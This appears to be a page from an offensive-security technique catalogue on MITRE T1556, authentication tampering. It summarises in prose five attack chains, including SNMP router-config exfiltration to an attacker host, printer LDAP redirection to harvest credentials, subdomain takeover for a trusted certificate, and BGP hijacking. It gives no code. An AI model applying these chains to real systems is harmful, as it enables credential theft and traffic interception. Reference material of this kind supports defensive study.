Modify Authentication Process
Subvert auth — Skeleton Key, password filter DLLs, fake LDAP listeners, swapping cert / key material, SSO IdP tampering.
§ Where this technique fits
T1556 is catalogued under the Credential Access tactic of the offensive-security kill-chain. It appears in 5 approved dossiers in the registry, typically at step 4.2 on average.
Authoritative reference: attack.mitre.org/techniques/T1556/.
§ Dossiers chaining this technique
- step 3 / 5
Insider admin panel coercion → mass account takeover (Twitter 2020)
Identify employees with access to an internal admin panel. SE / coerce one to use the panel to change target accounts' email + 2FA, then take them over.
- step 4 / 6
Subdomain takeover → ACME DNS-01 → trusted cert for victim host
Find a dangling CNAME / NS record. Claim the underlying resource; complete Let's Encrypt's DNS-01 challenge for the parent hostname. Now have a publicly-trusted cert for victim.example.com — chain into AITM.
- step 4 / 6
SNMPv2c write-community → router config exfil → cred sprays
Find a router with 'private' RW community. Trigger SNMP-to-TFTP config download to attacker host. The config has RADIUS shared secret, AAA server IP, ISAKMP PSKs, and SSH user-pubkeys — spray harvested creds.
- step 5 / 5
BGP prefix hijack → traffic interception
From a compliant origin AS, announce a more-specific or origin-spoofed prefix belonging to the victim. Internet routing converges on the attacker AS; traffic for that prefix flows through attacker for inspection / DoS.
- step 5 / 7
Reconfigure MFP LDAP → harvest service-account credentials
Walk up to / network-into the MFP admin web panel (default creds), change the LDAP address-book server to attacker IP — printer immediately re-binds and sends its service-account creds in cleartext.
§ What commonly comes next
- 01Valid Accountsseen 2×T1078 · Initial Access
- 02AITM Phishing — Evilginx / Modlishkaseen 1×PH-AITM-EVILGINX · Initial Access
- 03Password Sprayingseen 1×T1110.003 · Credential Access